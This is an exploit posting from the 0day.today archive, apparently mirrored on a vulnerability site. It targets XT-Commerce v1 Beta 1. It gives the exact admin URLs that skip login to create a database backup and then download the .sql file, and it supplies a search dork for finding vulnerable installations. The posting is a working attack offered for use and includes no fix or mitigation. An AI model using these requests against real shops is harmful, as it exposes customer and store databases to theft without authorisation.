XT-Commerce v1 Beta 1 => by Pass / Creat + Download Backup Vuln

🗓️ 29 Apr 2010 00:00:00Reported by indoushkaType

zdt🔗 0day.today👁 20 Views

XT-Commerce v1 Beta 1 Backup Vulnerability by Pass / Creation and Downloa

==========================================================================
XT-Commerce v1 Beta 1 => by Pass / Creat and Download Backup Vulnerability
==========================================================================

========================================================================================                 
| # Title    : XT-Commerce v1 Beta 1 => by Pass / Creat and Download Backup Vulnerability  
| # Author   : indoushka                                                              
| # email    : [email protected]                                                                                                                                                                   
| # Dork     : Powered by XT-Commerce                                                                                                              
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0)       
| # Bug      : Backup                                                                    
======================      Exploit By indoushka       =================================
# Exploit  : 
 
http://127.0.0.1/XT-Commerce/admin/backup.php/login.php?action=backupnow
 
to download buckup :http://127.0.0.1/XT-Commerce/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql
 
db_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 + Mozilla Firefox



#  0day.today [2018-01-04]  #

29 Apr 2010 00:00Current

7.1High risk

Vulners AI Score7.1